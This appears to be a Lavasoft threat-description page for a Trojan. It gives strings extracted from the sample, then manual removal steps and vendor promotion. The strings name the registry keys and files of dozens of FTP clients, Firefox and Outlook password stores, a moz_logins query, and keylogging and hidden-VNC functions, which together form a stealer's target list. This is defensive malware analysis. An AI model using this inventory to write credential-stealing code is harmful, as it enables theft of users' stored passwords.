CLSID\{11C1D741-A95B-11d2-8A80-0080ADB32FF4}\InProcServer32
sites.db
servers.xml
\FTPGetter
ESTdb2.dat
\Estsoft\ALFTP
QData.dat
SM.arch
FTP  .Link\shell\open\command
NppFTP.xml
Software\MAS-Soft\FTPInfo\Setup
ServerList.xml
\FTPInfo
NovaFTP.db
\INSoftware\NovaFTP
\sites.xml
ftplast.osd
\SharedSettings.ccs
\SharedSettings.sqlite
\SharedSettings_1_0_5.ccs
\SharedSettings_1_0_5.sqlite
\32BitFtp.ini
FTPCON
FTP CONTROL
FTPVoyager.ftp
\RhinoSoft.com
FTPVoyager.qc
FTPVoyager.Archive
SiteInfo.QFP
WinFTP
DeluxeFTP
sites.xml
Staff-FTP
sites.ini
FreshFTP
Software\FlashPeak\BlazeFtp\Settings
LastPassword
LastPort
BlazeFtp
site.dat
\BlazeFtp
GoFTP
Connections.txt
3D-FTP
\3D-FTP
SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32
EasyFTP
FTPNow
FTP Now
FTPShell
ftpshell.fsi
ftpsite.ini
FTPList.db
My FTP
project.ini
Mailbox.ini
FTP Navigator
FTP Commander
ftplist.txt
Software\Sota\FFFTP
Software\Sota\FFFTP\Options
Software\FTPWare\COREFTP\Sites
FtpPort
Software\Cryer\WebSitePublisher
_Password
Software\NCH Software\ClassicFTP\FTPAccounts
FtpPassword
_FtpPassword
FtpServer
FtpUserName
FtpDirectory
Software\FTPClient\Sites
Software\SoftX.org\FTPClient\Sites
PortNumber
PassWord
Software\South River Technologies\WebDrive\Connections
Software\LinasFTP\Site Manager
FTP destination password
FTP destination server
FTP destination port
FTP destination user
FTP destination catalog
FTP profiles
Msi.dll
{74FF1730-B1F2-4D88-926B-1568FAE61DB7}
\PocoSystem.ini
accounts.ini
sites.dat
\LeapWare\LeapFTP
unleap.exe
leapftp
FtpIniName
Software\Ghisler\Windows Commander
wcx_PTF.ini
\sitemanager.xml
\recentservers.xml
\filezilla.xml
"password" : "
"password":"
\drives.js
\ExpanDrive\favorites.js
\ExpanDrive\drives.js
wiseftpsrvs.ini
wisePTF.ini
wiseftpsrvs.bin
SOFTWARE\Classes\TypeLib\{CB1F2C0F-8094-4AAC-BCF5-41A64E27F777}
SOFTWARE\Classes\TypeLib\{9EA55529-E122-4757-BC79-E4825F80732C}
FTP Count
FTP File%u
Robo-FTP
SOFTWARE\%s\FTPServers
user.config
.duck
SiteServer %u\Host
SiteServer %u\WebUrl
SiteServer %u\Remote Directory
SiteServer %u-User
SiteServer %u-User PW
SiteServer %u\SFTP
Keychain
Software\Nico Mak Computing\WinZip\FTP
PK11_GetInternalKeySlot
sqlite3.dll
mozsqlite3.dll
sqlite3_open
sqlite3_close
sqlite3_prepare
sqlite3_step
sqlite3_column_bytes
sqlite3_column_blob
SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins
PTF://
signons.sqlite
\profiles.ini
PathToExe
\Mozilla\Firefox\
Firefox
Software\Mozilla
fireFTPsites.dat
\Mozilla\SeaMonkey\
SeaMonkey
\Mozilla\Profiles\
Mozilla
password 51:b:
SMTP Password
HTTPMail Password
NNTP Password
IMAP Password
POP3 Password
SMTP Password2
HTTPMail Password2
NNTP Password2
IMAP Password2
POP3 Password2
IMAP Port
SMTP Port
POP3 Port
SMTP User
HTTPMail Server
HTTPMail User Name
HTTP Server URL
HTTP User
SMTP User Name
SMTP Server
SMTP Email Address
{X-X-X-XX-XXXXXX}
inetcomm server passwords
outlook account manager passwords
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Pstorec.dll
[VNC] EXEC: %s
[VDESK] Read CMD %u[%u]
[VDESK] NOT AUTH CMD %u
GetAsyncKeyState
USER32.DLL
GetKeyboardState
GetKeyState
?WINMM.DLL
?DSOUND.DLL
ZwConnectPort
NTDLL.DLL
[VNC] PROCESS=%s
\explorer.exe
[VNC] SearchApp Status = %u
[VNC] FileName = %s
[VNC] CmdLine = %s
[VNC] W64 Redir OLD=%u
[VNC] CreateProcess Status = %u (%u)
Chrome_WidgetWin_1
SysShadow
Chrome_WidgetWin_0
Dxtrans.dll
d3d11.dll
d3d9.dll
OPENGL32.dll
d2d1.dll
d3d10core.dll
d3d10.dll
d3d10_1core.dll
d3d10_1.dll
RegCloseKey
RegNotifyChangeKeyValue
ShellExecuteA
DeleteUrlCacheEntry
EnumWindows
ActivateKeyboardLayout
SetViewportOrgEx
RegEnumKeyExA
RegCreateKeyA
RegOpenKeyExA
CryptImportKey
CryptDestroyKey
RegOpenKeyA
CertOpenSystemStoreA
CertDeleteCertificateFromStore
CertAddCertificateContextToStore
CertCloseStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
PFXExportCertStoreEx
SHDeleteKeyA
FindNextUrlCacheEntryW
FindFirstUrlCacheEntryW
FindCloseUrlCache
WinExec
KERNEL32.dll
MSVCRT.dll
IPHLPAPI.DLL
GetWindowsDirectoryW
CallNamedPipeA
ConnectNamedPipe
CreateNamedPipeW
DisconnectNamedPipe
CreateNamedPipeA
GetWindowsDirectoryA
COMDLG32.dll
2)2.2;2~2
7 :(:1:7:
9.979`9}9
8-9G9Z9f9r9}9
%Program Files%\Java\jre6\bin\jqs.exe
s.dat
iexplore.exe
firefox.exe
chrome.exe
\System32\kernel32.dll
\System32\kernelbase.dll
\ThemeApiPort


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Scan a system with an anti-rootkit tool.
  2. Terminate malicious process(es) (How to End a Process With the Task Manager):

    regsvr32.exe:1360

  3. Delete the original Trojan file.
  4. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\All Users\Application Data\wzbrwgd.dat (281 bytes)

  5. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "wzbrwgd" = "regsvr32.exe %Documents and Settings%\All Users\Application Data\wzbrwgd.dat"

  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2026 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now